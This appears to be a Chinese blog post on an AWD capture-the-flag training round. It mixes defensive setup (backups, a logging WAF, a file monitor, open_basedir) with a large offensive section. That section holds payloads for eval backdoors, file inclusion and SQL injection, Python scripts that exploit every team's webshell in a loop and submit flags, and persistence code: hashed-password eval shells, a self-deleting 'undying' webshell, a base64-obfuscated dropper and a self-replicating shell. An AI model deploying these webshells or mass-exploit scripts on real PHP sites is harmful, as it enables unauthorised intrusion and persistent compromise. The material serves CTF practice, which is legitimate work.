赛前赛后"/>
AWD之赛前赛后
0xdawn
作为一名资深懒狗,距离上一次星盟四月AWD训练赛过去一个月,在五月训练前才开始整理AWD,请大佬轻锤。
训练赛使用的是实验室自研的H1ve平台,强行安利一下H1ve顺便吹一波彭锅
赛后总结我拿的是第一道题web_yunnan_simple
来写的
上线后
上线一定要快,晚点上线人家马都给你安排上了
修改ssh密码
passwd username //回车输入新密码
备份源码
tar -zcvf /tmp/web.tar.gz /var/www/html/* //tar打包
定期备份的话因人而异,我不是很喜欢用
crontab backupcrontab.txt
backupcrontab.txt中写入
0 1 * * * tar -zcvf /tmp/web.tar.gz /var/www/html/*
详见:Linux中使用crontab设置定时任务
预留后门查杀
- D盾
- WebShellKiller
config.php
@eval($_REQUEST['c']);payload:
http://106.52.236.34:10180/config.php?c=system(%27cat%20/flag%27);
footer.php
$shell=$_POST['shell'];
system($shell);payload:
POST
shell=cat /flag
admin/footer.php同上
admin/header.php
<?php $p=$_GET['p'];echo $p;$q=exec($p);var_dump($q);
?>payload:
http://106.52.236.34:10180/admin/header.php?p=cat%20/flag
修改Mysql密码
mysql -u root -p //登陆后用以下命令
set password for root@localhost=password('新密码');
备份数据库
账号密码一般在config.php,如果修改了密码记得修改config.php
备份:mysqldump -u root -p dbname>db.sql
还原:create database tmp;use tmp;source db.sql
修改admin默认密码
update admin set user_pass='新密码' where user_name='admin';
上回只补了login页面的sql注入,没注意到默认密码可以一直登录拿flag
添加脚本
流量监控
郁离歌大佬的waf
<?phperror_reporting(0);
define('LOG_FILEDIR','/tmp/loooooooogs');
if(!is_dir(LOG_FILEDIR)){mkdir(LOG_FILEDIR);
}
function waf()
{
if (!function_exists('getallheaders')) {
function getallheaders() {
foreach ($_SERVER as $name => $value) {
if (substr($name, 0, 5) == 'HTTP_')
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
}
return $headers;
}
}
$get = $_GET;
$post = $_POST;
$cookie = $_COOKIE;
$Session = $_SESSION; // added
$header = getallheaders();
$files = $_FILES;
$ip = $_SERVER["REMOTE_ADDR"];
$method = $_SERVER['REQUEST_METHOD'];
$filepath = $_SERVER["SCRIPT_NAME"];
foreach ($_FILES as $key => $value) {
$files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']);
file_put_contents($_FILES[$key]['tmp_name'], "virink");
}unset($header['Accept']);
$input = array("Get"=>$get, "Post"=>$post, "Cookie"=>$cookie, "File"=>$files, "Session"=>$_SESSION,"Header"=>$header);logging($input);}function logging($var){
$filename = $_SERVER['REMOTE_ADDR'];
$LOG_FILENAME = LOG_FILEDIR."/".$filename;
$time = date("Y-m-d G:i:s");
file_put_contents($LOG_FILENAME, "\r\n".$time."\r\n".print_r($var, true), FILE_APPEND);
file_put_contents($LOG_FILENAME,"\r\n".'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'], FILE_APPEND);
file_put_contents($LOG_FILENAME,"\r\n***************************************************************",FILE_APPEND);
}waf();
使用方法:
在所有php文件中加入``require_once(‘waf.php’);
懒狗的话直接找个公用文件,如config.php,然后包含waf
或者修改php.ini文件
Automatically add files before or after any PHP document.
auto_prepend_file = /var/www/html/waf.php;
另外一个功能更强大的:
文件监控
<?php
/*
-------------------------------------------------File Name: fileMonitorDescription :Author : CoolCatdate: 2019/1/3
-------------------------------------------------Change Activity:2019/1/3:
-------------------------------------------------
*/
class FileMonitor
{private $dir;private $i=0;private $files = [];private $filesize = [];public function __construct($argv){$this->dir = $this->getparam($argv);$this->getfiles($this->dir);print "[+] total:".count($this->files[$this->i])."\n\r";$this->i++;while(true){$this->getfiles($this->dir);if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])>count($this->files[$this->i-1])))){print "[+] total:".count($this->files[$this->i])."\n\r";print "[*] addfile: ".implode('|',array_diff($this->files[$this->i],$this->files[$this->i-1]))."\n\r";}if(isset($this->files[$this->i-1]) && ((count($this->files[$this->i])<count($this->files[$this->i-1])))){print "[+] total:".count($this->files[$this->i])."\n\r";print "[*] deletefile: ".implode('|',array_diff($this->files[$this->i-1],$this->files[$this->i]))."\n\r";}if(isset($this->filesize[$this->i-1])){array_map(function($v,$val,$key){if($v != $val){print "[*] updatefile:{$key}\n\r";}},$this->filesize[$this->i-1],$this->filesize[$this->i],array_keys($this->filesize[$this->i]));}$this->i++;if($this->i>=30){$this->files = [];$this->filesize = [];$this->i = 0;}}}private function getparam($argv){foreach($argv as $key=>$val){if($val == "--dir"){return is_dir($argv[$key+1])?$argv[$key+1]:exit("[-] directory does not exist!");}}}private function getfiles($dir){if(is_dir($dir)){$d = scandir($dir);foreach($d as $v){if($v != '.' && $v != '..'){if(is_dir("{$dir}/{$v}")){$this->getfiles("{$dir}/{$v}"); }else{$this->files[$this->i][] = "{$dir}/{$v}";$this->filesize[$this->i]["{$dir}/{$v}"] = filesize("{$dir}/{$v}");}}}}else{$this->files[$this->i][] = $dir;$this->filesize[$this->i][$dir] = filesize($dir);}}
}
print " _____________< FileMonitor >-------------/\_)o<| | | O . O |\_____/By CoolCat
";
new FileMonitor($argv);
?>
用法
php fileMonitor.php --dir ./
代码审计
文件包含
about.php
$file=$_GET['file'];
include $file;payload:
http://106.52.236.34:10180/about.php?file=../../../flag
contact.php
$file_path = $_GET['path'];
if(file_exists($file_path)){$fp = fopen($file_path,"r");$str = fread($fp,filesize($file_path));echo $str = str_replace("\r\n","<br />",$str);
}payload:
http://106.52.236.34:10180/contact.php?path=../../../flag
sql注入
login.php
<?phpinclude_once('config.php');if (!empty($_POST['username'])) {$user=$_POST['username'];$pass=$_POST['password'];$query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";$data = mysqli_query($dbc,$query); if (mysqli_num_rows($data) == 1) {$row = mysqli_fetch_array($data);$_SESSION['username'] = $row['user_name'];header('Location: ./admin/index.php');}else{echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';}}
?>payload:
username:admin' and 1=1#
password:随便填
search.php
<?phpinclude 'header.php';include_once('config.php');if (!empty($_GET['id'])) {$id=$_GET['id'];$query = "SELECT * FROM news WHERE id=$id";$data = mysqli_query($dbc,$query); }$com = mysqli_fetch_array($data);
?>payload:
http://106.52.236.34:10180/search.php?id=-1%20union%20select%201,group_concat(user_name,0x7e,user_pass),3%20from%20test.admin%23
敏感信息泄露
admin/index.php
这里也挺鸡贼的,打到一半才发现这里直接就把flag给泄露出去了,admin登录直接拿到
<h3>flag:<?php system("cat /flag")?></h3>
admin/upload/1532851316.php
<?php phpinfo();?>
文件上传
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{if($name!==""){$name1=substr($name,-4);if(is_uploaded_file($tmpName)){$time=time();$rootpath='./upload/'.$time.$name1;$file=fopen($tmpName, "r") or die('No such file!');$content=fread($file, filesize($tmpName));if(strstr($content,'fuck')){exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");}if(!move_uploaded_file($tmpName,$rootpath)){echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";exit;}}echo "上传成功:/upload/".$time.$name1;}
}
catch(Exception $e)
{echo "ERROR";
}//直接传一句话小马就行,没有任何过滤
文件上传的洞还不太会修,训练赛的时候尝试补了一下,但是页面直接挂了。所以我直接注释掉输出上传文件的位置,并且重命名时在时间戳后面再拼了一些东西,所以即使传了马也用不了。似乎也没被check的样子…
$rootpath='./upload/'.$time.'随便拼点东西进来'.$name1;
修补工作
open_basedir
- 在php.ini中加入
open_basedir="/var/www/html"
- 在程序中加入
ini_set('open_basedir', '/var/www/html');
- 在apache的httpd.conf中的Directory配置
php_admin_value open_basedir "/var/www/html"
- httpd.conf中的VritualHost
php_admin_value open_basedir "/var/www/html"
- nginx fastcgi.conf:
fastcgi_param PHP_VALUE "open_basedir=/var/www/html"
addslashes
$id=addslashes($id); //sql语句中记得给$id加上单引号
批量打全场
打预留马
手速要快,预留的估计打个一两轮就没了,发现了就赶紧跑脚本打
import requests
import time#GET
url = "http://106.52.236.34:1"
payload = "/config.php?c=system('cat /flag');"for i in range(1,30):if (i <10):flag_url = url + "0" + str(i) + "80" + payloadelse:flag_url = url + str(i) + "80" + payloadprint(flag_url)r = requests.get(flag_url)if "flag" in r.text:print(r.text)print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")time.sleep(1)'''
#POST
url = "http://106.52.236.34:1"
payload = "/footer.php"
data = {'shell':'cat /flag'}for i in range(1,30):if (i <10):flag_url = url + "0" + str(i) + "80" + payloadelse:flag_url = url + str(i) + "80" + payloadprint(flag_url)r = requests.post(flag_url,data=data)if "flag" in r.text:print(r.text)print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")time.sleep(1)
'''
提交flag
#coding:utf-8
import requests
import re
import timeurl = "http://ip:"
url1 = ""
shell = "/includes/config.php?d=system"
passwd = "c"
port = "80"
payload = {passwd: 'cat /flag'}flag_server = "http://flag_server/flag_file.php?token=%s&flag=%s"
teamtoken = "team1"def submit_flag(target, teamtoken, flag):url = flag_server % (teamtoken, flag)pos = {}print "[+]Submitting flag:%s:%s" % (target, url)response = requests.post(url, data=pos)content = response.textprint "[+]content:%s" % contentif "success" in content:print "[+]Success!!"return Trueelse:print "[-]Failed"return Falsedef flag():f=open("webshelllist.txt","w") f1=open("firstround_flag.txt","w")for i in [8802,8803,8804]: url1=url+str(i)+shelltry:print "------------------------------------"res=requests.post(url1,payload,timeout=1)if res.status_code == requests.codes.ok:print url1 + " connect shell sucess,flag is "+res.text# 记录shell和获取的flagprint >>f1,url1+" connect shell sucess,flag is "+res.textprint >>f,url1+","+passwd# 正则捕获flagif re.match(r'hello world(\w+)', res.text): flag = re.match(r'hello world(\w+)', res.text).group(1)submit_flag(url1, teamtoken, flag)else:print "[-]Can not get flag"else:print "shell 404"except:print url1 + "connect shell failed"f.close()f1.close()def timer(n):while True:flag()flag()flag()time.sleep(n)timer(300) # 一般为5分钟一轮
权限维持
软连接
ln -s /flag css/XXXXXXXX.css
<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while (1){if(!file_exists('./css/8c2cbd7d93921dcd0859d0564a1df398.css')){system('ln -s /flag css/8c2cbd7d93921dcd0859d0564a1df398.css');}usleep(100);}
?>
一句话马
<?php if(md5($_POST["pass"])=="bc229eec746ba66ad1e326ff640e98fb"){@eval($_POST['hack']);} ?>
不死马
<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while (1){if(!file_exists('./.header.php')){file_put_contents('./.header.php','<?php if(md5($_POST["pass"])==="bc229eec746ba66ad1e326ff640e98fb"){@eval($_POST["hack"]);} ?>');}system('chmod 777 .header.php');touch("./.header.php",mktime(20,15,1,4,28,2019));usleep(100);}
?>"system(base64_decode(ZWNobyAnUEQ5d2FIQWdDZ2xwWjI1dmNtVmZkWE5sY2w5aFltOXlkQ2gwY25WbEtUc0tDWE5sZEY5MGFXMWxYMnhwYldsMEtEQXBPd29KZFc1c2FXNXJLRjlmUmtsTVJWOWZLVHNLQ1hkb2FXeGxJQ2d4S1hzS0NRbHBaaWdoWm1sc1pWOWxlR2x6ZEhNb0p5NHZMbWhsWVdSbGNpNXdhSEFuS1NsN0Nna0pDV1pwYkdWZmNIVjBYMk52Ym5SbGJuUnpLQ2N1THk1b1pXRmtaWEl1Y0dod0p5d25QRDl3YUhBZ2FXWW9iV1ExS0NSZlVFOVRWRnNpY0dGemN5SmRLVDA5UFNKaVl6SXlPV1ZsWXpjME5tSmhOalpoWkRGbE16STJabVkyTkRCbE9UaG1ZaUlwZTBCbGRtRnNLQ1JmVUU5VFZGc2lhR0ZqYXlKZEtUdDlJRDgrSnlrN0Nna0pmUW9KQ1hONWMzUmxiU2duWTJodGIyUWdOemMzSUM1b1pXRmtaWEl1Y0dod0p5azdDZ2tKZEc5MVkyZ29JaTR2TG1obFlXUmxjaTV3YUhBaUxHMXJkR2x0WlNneU1Dd3hOU3d4TERRc01qZ3NNakF4T1NrcE93b0pDWFZ6YkdWbGNDZ3hNREFwT3dvSmZRby9QZz09JyB8IGJhc2U2NCAtZCA+IC5jb25maWcucGhwOw==));"
核弹马
<?php set_time_limit(0);ignore_user_abort(true);unlink(__FILE__);while(1){file_put_contents(randstr().'.php',file_get_content(__FILE__));file_get_contents("http://127.0.0.1/");}?><?phpset_time_limit(0);ignore_user_abort(true);unlink(__FILE__);while(1){file_put_contents(randstr().'.php',file_get_content(__FILE__));file_get_contents("http://127.0.0.1/");}
?>
免杀一句话
待补充
更多推荐
AWD之赛前赛后
发布评论